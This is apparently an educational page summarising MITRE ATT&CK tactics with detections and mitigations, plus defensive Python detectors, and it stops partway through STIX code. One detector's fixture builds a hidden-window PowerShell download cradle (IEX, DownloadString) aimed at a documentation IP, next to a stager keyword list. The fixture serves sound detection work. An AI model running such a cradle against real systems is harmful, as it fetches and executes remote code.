🎯 MITRE ATT&CK Framework
The MITRE ATT&CK knowledge base of adversary Tactics, Techniques, and Procedures (TTPs). 14 tactics covering the full attack lifecycle — from Reconnaissance to Impact — with key techniques, detection strategies, and mitigations.
ATT&CK Lifecycle
MITRE ATT&CK Enterprise — 14 Tactics
Each tactic represents WHY an adversary acts. Techniques describe HOW.
Tactics & Techniques Deep-Dive
Reconnaissance
TA0043: Adversary gathers information to plan future operations — target org, infrastructure, employees, and technology stack.
⚔️ Key Techniques
| ID | Technique | Description |
|---|---|---|
| T1595 | Active Scanning | Port scanning, vulnerability scanning, banner grabbing |
| T1592 | Gather Victim Host Info | OS, hardware, installed software, patches |
| T1589 | Gather Victim Identity Info | Emails, credentials, employee names from LinkedIn, breaches |
| T1593 | Search Open Websites/Domains | OSINT from social media, code repositories and search engines (WHOIS, DNS records and Shodan fall under T1596 Search Open Technical Databases) |
| T1598 | Phishing for Information | Spear-phishing to gather intel before attack, pretexting |
🔎 Detection
- Monitor for unusual scanning activity
- Track WHOIS/DNS lookups to your infrastructure
- Alert on social engineering attempts
- Dark web monitoring for leaked credentials
🛡️ Mitigation
- Minimize public exposure of infrastructure details
- Implement strict email anti-phishing controls
- Monitor for credential leaks
- Network segmentation to limit reconnaissance value
Resource Development
TA0042: Adversary creates, purchases, or compromises resources to support operations — domains, accounts, tools, and infrastructure.
⚔️ Key Techniques
| ID | Technique | Description |
|---|---|---|
| T1583 | Acquire Infrastructure | Purchase domains, VPS, cloud accounts for C2 |
| T1584 | Compromise Infrastructure | Hack third-party servers to use as attack infrastructure |
| T1587 | Develop Capabilities | Custom malware, exploits, digital certificates |
| T1585 | Establish Accounts | Create social media/email accounts for social engineering |
| T1588 | Obtain Capabilities | Purchase malware, exploits, tools from underground markets |
🔎 Detection
- Track newly registered domains similar to yours (typosquatting)
- Monitor for look-alike domains
- Threat intel feeds for IOCs
- Certificate transparency log monitoring
🛡️ Mitigation
- Domain monitoring and takedown services
- Threat intelligence sharing (ISACs)
- Brand protection monitoring
- Preemptive domain registration of similar names
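The look-alike domain monitoring described above, as an added example that is not part of the original page: a small triage routine that classifies newly seen domains from a certificate-transparency or newly-registered-domain feed against one protected brand, using dnstwist-style permutations (homoglyph, transposition, omission), TLD swaps, embedded-brand labels and edit distance. The feed, the brand `example-corp.com` and the homoglyph table are constructed for the example; the "registrable label is everything before the last dot" rule is an assumption that only holds for single-label TLDs.

```python
# Added example (not from the original page): triage a feed of newly seen
# domains against one protected brand. The feed below is constructed, and the
# "registrable label = everything before the last dot" assumption only holds
# for single-label TLDs such as .com/.net (no public suffix list is used).
NEW_DOMAINS = [
    "examp1e-corp.com",        # digit substituted for 'l'
    "example-c0rp.com",        # digit substituted for 'o'
    "exampel-corp.com",        # adjacent characters transposed
    "exsample-corp.com",       # one character inserted
    "example-corp.co",         # TLD swapped
    "login-example-corp.com",  # brand embedded in a longer label
    "unrelated-site.net",      # benign
]

# Visually confusable substitutions; extend for your brand's character set.
HOMOGLYPHS = {"l": "1", "i": "1", "o": "0", "e": "3", "a": "4", "s": "5"}


def levenshtein(a: str, b: str) -> int:
    """Edit distance (insert/delete/substitute) between two strings."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def permutations(label: str) -> set:
    """Homoglyph, transposition and omission variants of a label (dnstwist-style)."""
    out = set()
    for i, ch in enumerate(label):
        if ch in HOMOGLYPHS:
            out.add(label[:i] + HOMOGLYPHS[ch] + label[i + 1:])
        if i + 1 < len(label):
            out.add(label[:i] + label[i + 1] + label[i] + label[i + 2:])
        out.add(label[:i] + label[i + 1:])
    out.discard(label)
    return out


def classify(domain: str, brand_label: str = "example-corp",
             brand_tld: str = "com", max_distance: int = 2):
    """Return a verdict for a look-alike domain, or None if it is unrelated."""
    label, _, tld = domain.lower().rpartition(".")
    if label == brand_label:
        return "tld-swap" if tld != brand_tld else None
    if label in permutations(brand_label):
        return "permutation"
    if brand_label in label:
        return "brand-embedded"
    if levenshtein(label, brand_label) <= max_distance:
        return "near-match"
    return None


def triage(domains, **kwargs) -> dict:
    """Map each suspicious domain to its verdict; benign domains are dropped."""
    return {d: v for d in domains if (v := classify(d, **kwargs)) is not None}


if __name__ == "__main__":
    for domain, verdict in triage(NEW_DOMAINS).items():
        print(f"{verdict:15} {domain}")
```

The permutation check runs before the edit-distance check so that a homoglyph hit is reported as such rather than as a generic near match; the distance threshold catches insertions and other variants the generator does not enumerate.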
Initial Access
TA0001: Adversary gains a foothold in the target network — phishing, exploiting public-facing applications, or using valid accounts.
⚔️ Key Techniques
| ID | Technique | Description |
|---|---|---|
| T1566 | Phishing | Spear-phishing attachments, links, or via service (Teams, Slack) |
| T1190 | Exploit Public-Facing App | Exploit vulns in web servers, VPNs, firewalls (Log4Shell, ProxyShell) |
| T1078 | Valid Accounts | Compromised credentials from breaches, brute force, or buying on dark web |
| T1195 | Supply Chain Compromise | Compromise software updates or dependencies (SolarWinds, xz utils) |
| T1199 | Trusted Relationship | Exploit MSPs, vendors, or partners with network access |
🔎 Detection
- Email security gateways with sandbox detonation
- IDS/IPS for exploit signatures
- Impossible travel detection for valid accounts
- Monitor for unusual login patterns
🛡️ Mitigation
- Security awareness training
- Patch management for public-facing apps
- MFA on all accounts
- Network segmentation for vendors
- Zero trust architecture
Execution
TA0002: Adversary runs malicious code on the target system — via scripting, command-line, or exploitation.
⚔️ Key Techniques
| ID | Technique | Description |
|---|---|---|
| T1059 | Command & Scripting Interpreter | PowerShell, Bash, Python, VBScript, JavaScript |
| T1203 | Exploitation for Client Execution | Browser, Office, PDF exploits |
| T1204 | User Execution | User opens malicious attachment or clicks link |
| T1047 | Windows Management Instrumentation (WMI) | Local or remote execution via WMI (wmic process call create, Invoke-WmiMethod) |
| T1053 | Scheduled Task/Job | Cron jobs, Windows Task Scheduler (schtasks), systemd timers, the legacy at command |
🔎 Detection
- Script block logging (PowerShell)
- EDR behavioral analysis
- Application whitelisting alerts
- Process creation monitoring (Sysmon)
- Command-line auditing
🛡️ Mitigation
- Application whitelisting (AppLocker, WDAC)
- Disable macro execution in Office
- Script execution policies
- EDR with behavioral detection
- Constrained Language Mode for PowerShell
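The command-line auditing and script-block points above in practice, as an added example that is not part of the original page: a detector for `-EncodedCommand` launches in Sysmon Event ID 1 style command lines that decodes the UTF-16LE base64 payload and scores the decoded script, since the raw command line hides the download cradle. The sample command lines, the indicator list and the scoring are constructed for the example; the 192.0.2.10 address is a documentation address.

```python
import base64
import re


def _encode_ps(script: str) -> str:
    """Encode a script the way powershell.exe -EncodedCommand expects (UTF-16LE, base64)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed Sysmon Event ID 1 style command lines (not real telemetry). The
# "malicious" one is a download-cradle lookalike pointed at a documentation IP.
SAMPLE_CMDLINES = [
    "powershell.exe -NoP -W Hidden -enc " + _encode_ps(
        "IEX (New-Object Net.WebClient).DownloadString('http://192.0.2.10/a.ps1')"),
    "powershell.exe -ExecutionPolicy Bypass -File C:\\scripts\\backup.ps1",
    "powershell.exe -EncodedCommand " + _encode_ps(
        "Get-Service | Where-Object Status -eq Running"),
]

# powershell.exe accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc, ...).
_PREFIXES = "|".join("encodedcommand"[:n] for n in range(1, 15))
ENC_FLAG = re.compile(rf"(?:^|\s)[-/](?:{_PREFIXES})\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)
HIDDEN_WINDOW = re.compile(r"-w\w*\s+hidden", re.IGNORECASE)

# Substrings rare in administrative scripts but common in stagers (constructed list).
INDICATORS = ("iex", "invoke-expression", "downloadstring", "downloadfile",
              "invoke-webrequest", "frombase64string", "net.webclient")


def decode_encoded_command(cmdline: str):
    """Return the decoded script if the command line carries -EncodedCommand, else None."""
    match = ENC_FLAG.search(cmdline)
    if not match:
        return None
    try:
        return base64.b64decode(match.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyze(cmdline: str) -> dict:
    """Score one process-creation command line; the decoded script is what gets inspected."""
    decoded = decode_encoded_command(cmdline)
    text = (decoded if decoded is not None else cmdline).lower()
    hits = [i for i in INDICATORS if i in text]
    hidden = HIDDEN_WINDOW.search(cmdline) is not None
    return {
        "encoded": decoded is not None,
        "decoded": decoded,
        "indicators": hits,
        "hidden_window": hidden,
        "score": len(hits) + int(hidden),
    }


if __name__ == "__main__":
    for line in SAMPLE_CMDLINES:
        result = analyze(line)
        print(result["score"], result["indicators"], result["decoded"] or line)
```

Encoding alone is not malicious (the third sample is an ordinary encoded `Get-Service`), which is why the score comes from the decoded content plus the hidden-window flag rather than from the presence of `-enc`.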
Persistence
TA0003: Adversary maintains access across restarts, credential changes, and remediation — via backdoors, scheduled tasks, or registry modifications.
⚔️ Key Techniques
| ID | Technique | Description |
|---|---|---|
| T1547 | Boot/Logon Autostart | Registry run keys, startup folders, login scripts |
| T1136 | Create Account | New local/domain/cloud accounts for persistent access |
| T1053 | Scheduled Task/Job | Persistent execution via scheduled tasks or cron |
| T1505 | Server Software Component | Web shells (China Chopper, JSP shells; T1505.003), SQL stored procedures (T1505.001), IIS components |
| T1098 | Account Manipulation | Add credentials, modify permissions, add SSH keys |
🔎 Detection
- Monitor registry autoruns and startup items
- Track new account creation events
- File integrity monitoring on web servers
- Audit scheduled tasks and cron changes
- Monitor SSH authorized_keys changes
🛡️ Mitigation
- Privileged access management (PAM)
- Regular audit of accounts and permissions
- File integrity monitoring (FIM)
- Restrict ability to create accounts
- GPO controls for autorun locations
Privilege Escalation
TA0004: Adversary gains higher-level permissions — exploiting misconfigurations, vulnerabilities, or credential theft to move from user to admin/root/SYSTEM.
⚔️ Key Techniques
| ID | Technique | Description |
|---|---|---|
| T1068 | Exploitation for Privilege Escalation | Kernel and driver exploits, vulnerable local services (UAC bypass belongs under T1548.002) |
| T1078 | Valid Accounts | Using compromised admin or service account credentials |
| T1548 | Abuse Elevation Control | UAC bypass, sudo abuse, setuid/setgid manipulation |
| T1134 | Access Token Manipulation | Token impersonation, stealing tokens from other processes |
| T1484 | Domain Policy Modification | GPO abuse, trust relationship manipulation |
🔎 Detection
- Monitor for privilege escalation events (Event ID 4672 special privileges assigned to new logon, 4673 privileged service called)
- Track UAC bypass attempts
- Alert on unexpected admin group changes
- Monitor for token manipulation behavior
- GPO change auditing
🛡️ Mitigation
- Least privilege principle
- Patch local vulnerabilities promptly
- Credential Guard on Windows
- Harden UAC settings
- PAM solutions with JIT access
Defense Evasion
TA0005: Adversary avoids detection — disabling security tools, obfuscating code, masquerading as legitimate processes, or clearing logs.
⚔️ Key Techniques
| ID | Technique | Description |
|---|---|---|
| T1027 | Obfuscated Files/Information | Encoded payloads, packed executables, steganography |
| T1070 | Indicator Removal | Clear event logs, delete files, timestomp |
| T1036 | Masquerading | Rename malware to svchost.exe, spoof file extensions |
| T1562 | Impair Defenses | Disable AV, tamper with EDR, stop logging services |
| T1055 | Process Injection | DLL injection, process hollowing, thread hijacking |
🔎 Detection
- EDR with tamper protection
- SIEM correlation for log gaps
- Monitor for AV/EDR service stops
- Behavioral analysis (not just signature)
- Memory scanning for injected code
🛡️ Mitigation
- Tamper-proof EDR with kernel-level protection
- Centralize logs to prevent local deletion
- Code signing enforcement
- Protected Process Light (PPL) for critical services
- Attack surface reduction rules
Credential Access
TA0006: Adversary steals credentials — password hashes, tokens, tickets, keys — to move laterally and escalate privileges.
⚔️ Key Techniques
| ID | Technique | Description |
|---|---|---|
| T1003 | OS Credential Dumping | LSASS dump (Mimikatz), SAM database, /etc/shadow, DCSync |
| T1110 | Brute Force | Password spraying, credential stuffing, dictionary attacks |
| T1558 | Steal/Forge Kerberos Tickets | Kerberoasting, Golden Ticket, Silver Ticket attacks |
| T1557 | Adversary-in-the-Middle | LLMNR/NBT-NS poisoning, ARP spoofing, HTTPS interception |
| T1552 | Unsecured Credentials | Passwords in files, registry, scripts, environment variables |
🔎 Detection
- Monitor LSASS access patterns
- Detect Kerberos anomalies (Event ID 4769 with RC4 encryption type 0x17, bursts of TGS requests for many SPNs from one user)
- Alert on password spray patterns (many accounts, few passwords)
- Network traffic analysis for AitM
- Honey tokens / honey credentials
🛡️ Mitigation
- Credential Guard / LSA protection
- Disable NTLM where possible
- Managed Service Accounts (gMSA)
- Privileged Access Workstations (PAWs)
- Regular password rotation for service accounts
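The password spray pattern from the detection list above ("many accounts, few passwords"), as an added example that is not part of the original page: a sliding-window detector over Windows Security 4625 failed-logon events that flags a source hitting many distinct accounts with only a few attempts each, while ignoring a single user who mistypes her own password. The events, source addresses and thresholds are constructed for the example.

```python
from collections import defaultdict
from datetime import datetime, timedelta


def build_events():
    """Constructed Security log 4625 (failed logon) events, not real telemetry:
    one external source sprays one guess across 40 accounts, and one user
    mistypes her own password five times."""
    base = datetime(2024, 5, 1, 8, 0, 0)
    events = []
    for i in range(40):
        events.append({"ts": base + timedelta(seconds=15 * i), "event_id": 4625,
                       "src_ip": "198.51.100.7", "user": f"user{i:02d}",
                       "status": "0xC000006A"})   # STATUS_WRONG_PASSWORD
    for i in range(5):
        events.append({"ts": base + timedelta(minutes=2, seconds=20 * i), "event_id": 4625,
                       "src_ip": "10.0.0.5", "user": "alice", "status": "0xC000006A"})
    return events


def detect_password_spray(events, window=timedelta(minutes=30),
                          min_users=20, max_per_user=3):
    """Flag sources whose failures within `window` hit many distinct accounts
    with only a few attempts each (the spray signature), reporting the widest
    such window per source. Brute force against one account (many attempts,
    one user) deliberately does not match; that is a separate rule."""
    failures = defaultdict(list)
    for e in sorted(events, key=lambda e: e["ts"]):
        if e["event_id"] == 4625:
            failures[e["src_ip"]].append(e)

    alerts = []
    for src_ip, evs in failures.items():
        best = None
        start = 0
        for end in range(len(evs)):
            while evs[end]["ts"] - evs[start]["ts"] > window:
                start += 1
            per_user = defaultdict(int)
            for e in evs[start:end + 1]:
                per_user[e["user"]] += 1
            if len(per_user) >= min_users and max(per_user.values()) <= max_per_user:
                if best is None or len(per_user) > best["distinct_users"]:
                    best = {"src_ip": src_ip, "distinct_users": len(per_user),
                            "attempts": end - start + 1,
                            "first": evs[start]["ts"], "last": evs[end]["ts"]}
        if best:
            alerts.append(best)
    return alerts


if __name__ == "__main__":
    for a in detect_password_spray(build_events()):
        print(f"spray from {a['src_ip']}: {a['distinct_users']} accounts, "
              f"{a['attempts']} attempts between {a['first']} and {a['last']}")
```

For Azure AD or Kerberos-fronted environments the same logic applies to sign-in logs or Event ID 4771 (pre-authentication failure); the per-user cap is what separates a spray from a lockout-inducing brute force.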
Discovery
TA0007: Adversary explores the environment — network mapping, system enumeration, account discovery — to understand what to target.
⚔️ Key Techniques
| ID | Technique | Description |
|---|---|---|
| T1087 | Account Discovery | Enumerate local/domain/cloud accounts and groups |
| T1046 | Network Service Discovery | Port scanning, service enumeration within the network |
| T1083 | File & Directory Discovery | Search for sensitive files, configs, databases |
| T1069 | Permission Groups Discovery | Enumerate admin groups, Domain Admins, cloud IAM roles |
| T1018 | Remote System Discovery | Identify other reachable hosts (net view, ping sweeps) |
🔎 Detection
- Monitor for excessive LDAP/AD queries
- Alert on network scanning from internal hosts
- Track directory listing commands (dir, ls, find)
- Detect BloodHound/SharpHound collection
- Honey files and canary tokens
🛡️ Mitigation
- Network segmentation to limit discovery
- Restrict LDAP query scope
- Tiered administration model
- Disable unnecessary network protocols
- Deploy canary tokens and honeypots
Lateral Movement
TA0008: Adversary moves through the network — using stolen credentials, RDP, SMB, WMI, or exploiting trusts to reach high-value targets.
⚔️ Key Techniques
| ID | Technique | Description |
|---|---|---|
| T1021 | Remote Services | RDP, SSH, SMB/Windows Admin Shares, VNC, WinRM |
| T1550 | Use Alternate Auth Material | Pass-the-Hash, Pass-the-Ticket, web session cookies |
| T1570 | Lateral Tool Transfer | Copy tools to remote systems via SMB, SCP, or C2 |
| T1563 | Remote Service Session Hijacking | RDP hijacking, SSH session hijacking |
| T1210 | Exploitation of Remote Services | Exploit vulns in SMB (EternalBlue), RDP (BlueKeep) |
🔎 Detection
- Monitor for unusual RDP/SMB connections
- Detect Pass-the-Hash (Event ID 4624 with LogonType 3, NTLM authentication package and KeyLength 0 on the target; LogonType 9 with logon process seclogo on the source)
- Track lateral tool transfer (PsExec, wmic)
- Network traffic analysis for anomalous east-west traffic
- Alert on new admin logons to servers
🛡️ Mitigation
- Network segmentation and micro-segmentation
- Restrict admin protocols to PAWs only
- Disable NTLM, enforce Kerberos
- Local admin password solution (LAPS)
- Just-in-Time (JIT) privileged access
Collection
TA0009: Adversary gathers data of interest — emails, files, databases, screenshots, keystrokes — before exfiltration.
⚔️ Key Techniques
| ID | Technique | Description |
|---|---|---|
| T1114 | Email Collection | Mailbox access, Exchange server scraping, forwarding rules |
| T1056 | Input Capture | Keylogger, credential interception, web portal capture |
| T1113 | Screen Capture | Screenshots at intervals or on-demand |
| T1005 | Data from Local System | Sensitive files, databases, configuration files |
| T1560 | Archive Collected Data | Compress and encrypt before exfiltration (zip, rar, 7z) |
🔎 Detection
- Monitor for mass file access patterns
- Detect email forwarding rule creation
- DLP tools for sensitive data movement
- Alert on unusual archive creation
- Keystroke logging detection via EDR
🛡️ Mitigation
- Data Loss Prevention (DLP) policies
- Restrict email forwarding rules
- File access monitoring and classification
- Encrypt sensitive data at rest
- Limit access to sensitive repositories
Command & Control
TA0011: Adversary communicates with compromised systems to maintain control — using encrypted channels, legitimate services, or covert protocols.
⚔️ Key Techniques
| ID | Technique | Description |
|---|---|---|
| T1071 | Application Layer Protocol | C2 over HTTPS, DNS, email, WebSocket |
| T1573 | Encrypted Channel | TLS/SSL encrypted C2 traffic, custom encryption |
| T1105 | Ingress Tool Transfer | Download tools from C2 server or legitimate services |
| T1572 | Protocol Tunneling | DNS tunneling, ICMP tunneling, SSH tunneling |
| T1102 | Web Service | C2 via cloud services (GitHub, Google Drive, Slack, Telegram) |
🔎 Detection
- DNS query analysis for tunneling (high entropy, unusual TXT records)
- Network traffic analysis for beaconing patterns
- JA3/JA3S TLS fingerprinting
- Monitor connections to uncommon cloud services
- Detect long-duration connections and periodic callbacks
🛡️ Mitigation
- DNS filtering and monitoring
- TLS inspection / SSL decryption
- Network segmentation and egress filtering
- Block known C2 infrastructure (threat intel)
- Application-aware firewalls (NGFW)
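The beaconing and periodic-callback detection from the list above, as an added example that is not part of the original page: flow records are grouped per (source, destination, port) and a pair is flagged when both the inter-arrival times and the request sizes are nearly constant, measured by coefficient of variation, which is what separates a sleep-with-jitter implant from bursty human traffic. The flow records, the 203.0.113.44 and 198.51.100.20 addresses and the thresholds are constructed for the example.

```python
import statistics
from collections import defaultdict
from datetime import datetime, timedelta


def build_connections():
    """Constructed flow records (not real traffic): one host talks to a C2 every
    ~60 s with small jitter and a fixed request size, and browses a normal site
    at irregular intervals with varying sizes."""
    base = datetime(2024, 5, 1, 9, 0, 0)
    flows = []
    t = base
    for jitter in (0, 2, -3, 1, -2, 3, 0, -1, 2, -2, 1, 0):
        t += timedelta(seconds=60 + jitter)
        flows.append({"ts": t, "src": "10.0.2.15", "dst": "203.0.113.44", "dport": 443, "bytes": 1184})
    t = base
    for gap, size in zip((5, 40, 3, 300, 12, 8, 600, 2, 90, 25, 1, 15),
                         (900, 15000, 2300, 48000, 700, 9900, 1200, 31000, 4400, 800, 22000, 5100)):
        t += timedelta(seconds=gap)
        flows.append({"ts": t, "src": "10.0.2.15", "dst": "198.51.100.20", "dport": 443, "bytes": size})
    return flows


def _cv(values) -> float:
    """Coefficient of variation: population std dev over mean (0 = perfectly regular)."""
    mean = statistics.mean(values)
    return statistics.pstdev(values) / mean if mean else float("inf")


def beacon_candidates(flows, min_flows=8, max_interval_cv=0.15, max_size_cv=0.2):
    """Group flows by (src, dst, port) and flag pairs whose inter-arrival times and
    sizes are both nearly constant. Human-driven traffic is bursty (high CV)."""
    by_pair = defaultdict(list)
    for f in flows:
        by_pair[(f["src"], f["dst"], f["dport"])].append(f)
    found = []
    for pair, evs in by_pair.items():
        if len(evs) < min_flows:
            continue
        evs.sort(key=lambda e: e["ts"])
        gaps = [(b["ts"] - a["ts"]).total_seconds() for a, b in zip(evs, evs[1:])]
        interval_cv = _cv(gaps)
        size_cv = _cv([e["bytes"] for e in evs])
        if interval_cv <= max_interval_cv and size_cv <= max_size_cv:
            found.append({"pair": pair, "count": len(evs),
                          "interval_s": round(statistics.mean(gaps), 1),
                          "interval_cv": round(interval_cv, 3), "size_cv": round(size_cv, 3)})
    return found


if __name__ == "__main__":
    for c in beacon_candidates(build_connections()):
        print(f"{c['pair']}: {c['count']} flows every ~{c['interval_s']}s "
              f"(interval CV {c['interval_cv']}, size CV {c['size_cv']})")
```

Implants with large jitter (for example 50%) push the interval CV above this threshold; for those, a histogram of intervals or the size regularity alone is the better signal, and the threshold should be tuned against a week of baseline flows.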
Exfiltration
TA0010: Adversary steals data from the network — transferring it via C2 channels, cloud storage, alternative protocols, or physical media.
⚔️ Key Techniques
| ID | Technique | Description |
|---|---|---|
| T1041 | Exfiltration Over C2 Channel | Data sent through existing C2 connection |
| T1567 | Exfiltration Over Web Service | Upload to cloud storage (Mega, Google Drive, S3) |
| T1048 | Exfiltration Over Alternative Protocol | DNS exfil, ICMP exfil, FTP, email attachments |
| T1537 | Transfer Data to Cloud Account | Copy data to attacker-controlled cloud subscription |
| T1029 | Scheduled Transfer | Exfiltrate at specific times to blend with normal traffic |
🔎 Detection
- DLP monitoring for outbound data patterns
- DNS exfiltration detection (long, high-entropy subdomain labels and many unique subdomains queried under one domain)
- Monitor cloud storage uploads from corporate endpoints
- Network baseline comparison for data volume anomalies
- Alert on large outbound transfers to new destinations
🛡️ Mitigation
- DLP at network edge and endpoints
- Restrict cloud storage access (CASB)
- Egress filtering and proxy inspection
- Block unapproved file sharing services
- Encrypt sensitive data (limits value if exfiltrated)
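The DNS tunneling and DNS exfiltration detections mentioned under both Command & Control and Exfiltration, served by one added example that is not part of the original page: resolver log lines are profiled per registered domain (unique subdomains, longest label, Shannon entropy of the subdomain part, query-type mix) and a domain is flagged when many distinct, long, high-entropy subdomains are queried under it, which is how a tool encoding data into labels looks. The log, the `exfil-test.net` domain and the thresholds are constructed; taking the registered domain as the last two labels is an assumption (no public suffix list).

```python
import base64
import hashlib
import math
import statistics
from collections import Counter, defaultdict


def build_log() -> str:
    """Constructed resolver log, one query per line: 'timestamp client qname qtype'.
    The tunnel lines carry base32-encoded chunks (derived from SHA-256 digests so the
    example is deterministic) as the leftmost label, the way DNS exfil tools do."""
    lines = [
        "2024-05-01T10:00:01 10.0.3.7 www.example.com A",
        "2024-05-01T10:00:02 10.0.3.7 mail.example.com MX",
        "2024-05-01T10:00:03 10.0.3.7 cdn-static.example.com A",
        "2024-05-01T10:00:04 10.0.3.7 api.example.com AAAA",
        "2024-05-01T10:00:05 10.0.3.7 login.example.com A",
        "2024-05-01T10:00:06 10.0.3.7 example.com A",
    ]
    for i in range(12):
        chunk = base64.b32encode(hashlib.sha256(f"chunk{i}".encode()).digest()[:30]).decode()
        lines.append(f"2024-05-01T10:01:{i:02d} 10.0.3.7 {chunk}.s{i}.exfil-test.net TXT")
    return "\n".join(lines)


def shannon_entropy(s: str) -> float:
    """Bits per character; base32/base64 payloads score far above hostnames."""
    if not s:
        return 0.0
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in Counter(s).values())


def parse(log: str):
    for line in log.strip().splitlines():
        ts, client, qname, qtype = line.split()
        yield {"ts": ts, "client": client, "qname": qname.lower().rstrip("."), "qtype": qtype}


def profile(queries):
    """Per registered domain (assumed = last two labels): unique subdomains,
    longest label per query, entropy of the subdomain part, and query types."""
    prof = defaultdict(lambda: {"subs": set(), "max_label": [], "entropy": [], "qtypes": Counter()})
    for q in queries:
        labels = q["qname"].split(".")
        if len(labels) < 3:
            continue                      # apex queries carry no subdomain to inspect
        domain, sub_labels = ".".join(labels[-2:]), labels[:-2]
        p = prof[domain]
        p["subs"].add(".".join(sub_labels))
        p["max_label"].append(max(len(label) for label in sub_labels))
        p["entropy"].append(shannon_entropy("".join(sub_labels)))
        p["qtypes"][q["qtype"]] += 1
    return prof


def flag_tunnels(prof, min_unique=10, min_label_len=20, min_entropy=3.5):
    """Flag domains with many distinct, long, high-entropy subdomains."""
    flagged = []
    for domain, p in prof.items():
        if len(p["subs"]) < min_unique:
            continue
        avg_label = statistics.mean(p["max_label"])
        avg_entropy = statistics.mean(p["entropy"])
        if avg_label >= min_label_len and avg_entropy >= min_entropy:
            total = sum(p["qtypes"].values())
            flagged.append({"domain": domain, "unique_subdomains": len(p["subs"]),
                            "avg_longest_label": round(avg_label, 1),
                            "avg_entropy": round(avg_entropy, 2),
                            "txt_share": round(p["qtypes"]["TXT"] / total, 2)})
    return flagged


if __name__ == "__main__":
    for f in flag_tunnels(profile(parse(build_log()))):
        print(f)
```

CDNs and some anti-virus or telemetry vendors legitimately query hashed-looking subdomains, so in production the flagged list is reduced by an allow-list of known high-entropy domains before alerting; the unique-subdomain count is the hardest feature for an attacker to suppress while still moving data.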
Impact
TA0040: Adversary disrupts availability, destroys data, or manipulates systems — ransomware, wipers, defacement, or business process manipulation.
⚔️ Key Techniques
| ID | Technique | Description |
|---|---|---|
| T1486 | Data Encrypted for Impact | Ransomware — encrypt files and demand payment (LockBit, BlackCat) |
| T1485 | Data Destruction | Wiper malware (NotPetya, WhisperGate, HermeticWiper) |
| T1489 | Service Stop | Stop critical services, databases, security tools before encryption |
| T1490 | Inhibit System Recovery | Delete shadow copies, disable backup agents, corrupt boot records |
| T1491 | Defacement | Internal/external website defacement for hacktivism or distraction |
🔎 Detection
- Monitor for mass file encryption (rapid file extension changes)
- Alert on shadow copy deletion (vssadmin, wmic)
- Track backup service/agent disruption
- File integrity monitoring for critical systems
- Canary files for ransomware early detection
🛡️ Mitigation
- Immutable backups (air-gapped, cloud with object lock)
- Ransomware protection in EDR
- Network segmentation to limit blast radius
- Incident response playbook for ransomware
- Cyber insurance with tested recovery plans
Threat Intelligence (CTI)
CTI Lifecycle
Cyber Threat Intelligence follows a structured lifecycle:
1. Direction: define intelligence requirements (which threats matter to your organization).
2. Collection: gather data from OSINT, dark web sources, ISACs, commercial feeds and internal telemetry.
3. Processing: normalize, enrich and deduplicate the raw data.
4. Analysis: produce actionable intelligence at the right level for each audience (strategic for executives, operational for IR and threat hunting, tactical for SOC detection).
5. Dissemination: share via reports, SIEM integration and automated feeds.
6. Feedback: evaluate effectiveness and refine the requirements.
Levels: Strategic (geopolitical and industry trends), Operational (TTPs, campaigns), Tactical (IOCs, signatures).
Diamond Model of Intrusion Analysis
Framework for analyzing and tracking cyber intrusions through four core features: Adversary — Who is attacking (threat actor, APT group). Capability — What tools/techniques they use (malware, exploits, TTPs). Infrastructure — What resources they use (C2 servers, domains, email accounts). Victim — Who is being targeted (org, person, system). Every intrusion event has these 4 vertices. Pivoting between vertices reveals new intelligence: from an IOC (infrastructure) → find related adversary → discover other campaigns → identify additional victims. Complements MITRE ATT&CK by adding adversary attribution and relationship context.
IOC Management & Enrichment
Indicators of Compromise (IOCs) are forensic artifacts — IP addresses, domains, file hashes, URLs, email addresses — that indicate a breach. Pyramid of Pain: Hash values (trivial to change) → IP addresses → domain names → network artifacts → host artifacts → tools → TTPs (hardest to change). Enrichment: Correlate IOCs with VirusTotal, Shodan, AbuseIPDB, GreyNoise, and AlienVault OTX. Key principle: Focus on TTP-based detection (top of pyramid) rather than low-level IOCs that adversaries change frequently. Automate IOC ingestion into SIEM/EDR via threat intel platform (MISP, ThreatConnect, Anomali).
STIX / TAXII Standards
STIX (Structured Threat Information Expression) — JSON-based language for describing threat intelligence: threat actors, campaigns, malware, vulnerabilities, indicators, attack patterns, and their relationships. STIX Domain Objects (SDOs) include Indicator, Malware, Attack Pattern, Threat Actor, Campaign; STIX Relationship Objects (SROs) link them (for example, an Indicator "indicates" a Malware). TAXII (Trusted Automated Exchange of Intelligence Information) — HTTPS-based transport protocol for sharing STIX data. TAXII 2.1 organizes content into API Roots and Collections that clients poll (pull); the publish/subscribe Channel (push) model appeared in earlier versions and is not part of TAXII 2.1. Enables automated sharing between organizations. Together: STIX defines WHAT to share; TAXII defines HOW to share it. Industry standard adopted by ISACs, MITRE, and most TIP platforms.
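What a STIX 2.1 bundle actually looks like, as an added example that is not part of the original page: builders for the SDOs named above (Indicator, Malware, Attack Pattern) and the Relationships that join them, plus a validator that checks the required properties, the `type--uuid` identifier format and that every relationship reference resolves inside the bundle. The ExampleRAT family, the `cdn-update.example.test` domain, the dropper hash and the timestamps are constructed for the example; the property sets are the STIX 2.1 required ones, trimmed to what the example needs.

```python
import hashlib
import json
import re
import uuid

TS = "2024-05-01T10:00:00.000Z"   # fixed timestamp keeps the example deterministic

ID_RE = re.compile(r"^[a-z][a-z0-9-]*--[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}$")
COMMON = ("type", "spec_version", "id", "created", "modified")
REQUIRED = {                      # STIX 2.1 required properties beyond the common ones
    "indicator": ("pattern", "pattern_type", "valid_from"),
    "malware": ("is_family",),
    "attack-pattern": ("name",),
    "relationship": ("relationship_type", "source_ref", "target_ref"),
}


def _sdo(obj_type, **props):
    base = {"type": obj_type, "spec_version": "2.1", "id": f"{obj_type}--{uuid.uuid4()}",
            "created": TS, "modified": TS}
    base.update(props)
    return base


def indicator(name, pattern):
    return _sdo("indicator", name=name, indicator_types=["malicious-activity"],
                pattern=pattern, pattern_type="stix", valid_from=TS)


def malware(name, is_family=False):
    return _sdo("malware", name=name, is_family=is_family, malware_types=["remote-access-trojan"])

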